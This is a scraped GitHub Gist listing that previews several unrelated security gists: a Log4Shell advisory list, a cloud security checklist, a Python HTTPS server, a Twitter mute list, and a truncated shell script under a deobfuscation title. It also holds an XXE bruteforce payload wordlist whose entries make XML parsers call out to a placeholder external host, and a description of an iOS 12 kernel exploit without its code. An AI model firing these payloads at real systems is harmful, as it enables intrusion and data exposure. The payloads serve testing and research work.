0xdevalias
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active
April 17, 2025 02:02
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # Remove the performance overlay, it meddles with some tasks | |
| unset LD_PRELOAD | |
| ## Shadow kwin_wayland_wrapper so that we can pass args to kwin wrapper | |
| ## whilst being launched by plasma-session | |
| mkdir $XDG_RUNTIME_DIR/nested_plasma -p | |
| cat <<EOF > $XDG_RUNTIME_DIR/nested_plasma/kwin_wayland_wrapper | |
| #!/bin/sh |
SwitHak
/ 20211210-TLP-WHITE_LOG4J.md
Last active
February 7, 2025 23:49
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC
Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
- If you want to add a link, comment or send it to me
- Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak
- Royce Williams list sorted by vendors responses Royce List
- Very detailed list NCSC-NL
- The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
ramimac
/ Cloud Security Orienteering Checklist.md
Last active
October 10, 2024 17:47
A Checklist of Cloud Security Orienteering
Cloud Security Orienteering: Checklist
by Rami McCarthy
via TL;DR sec
How to orienteer in a cloud environment, dig in to identify the risks that matter, and put together actionable plans that address short, medium, and long term goals.
Based on the Cloud Security Orienteering methodology.
0xmachos
/ macOS-IR-Forensics.md
Last active
April 4, 2025 21:28
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
stephenbradshaw
/ python3_https_server.py
Created
November 5, 2020 01:26
Python 3 Simple HTTPS server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # python3 update of https://gist.github.com/dergachev/7028596 | |
| # Create a basic certificate using openssl: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # Or to set CN, SAN and/or create a cert signed by your own root CA: https://thegreycorner.com/pentesting_stuff/writeups/selfsignedcert.html | |
| import http.server | |
| import ssl | |
| httpd = http.server.HTTPServer(('127.0.0.1', 443), http.server.SimpleHTTPRequestHandler) |
honoki
/ xxe-payloads.txt
Last active
November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
IanColdwater
/ twittermute.txt
Last active
April 14, 2025 16:31
Here are some terms to mute on Twitter to clean your timeline up a bit.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mute these words in your settings here: https://twitter.com/settings/muted_keywords | |
| ActivityTweet | |
| generic_activity_highlights | |
| generic_activity_momentsbreaking | |
| RankedOrganicTweet | |
| suggest_activity | |
| suggest_activity_feed | |
| suggest_activity_highlights | |
| suggest_activity_tweet |
This is a kernel exploit targeting iOS 12.0-12.2 and 12.4. It exploits a dangling kernel pointer to craft a fake task port corresponding to the kernel task and gets a send right to it.
This code is not readily compilable — some common sense is a prerequisite. If you do get it going though, it is extremely reliable on any device with more than a gigabyte of RAM. Interested readers may want to investigate how reallocations can be prevented -- this might improve reliability even more.
NewerOlder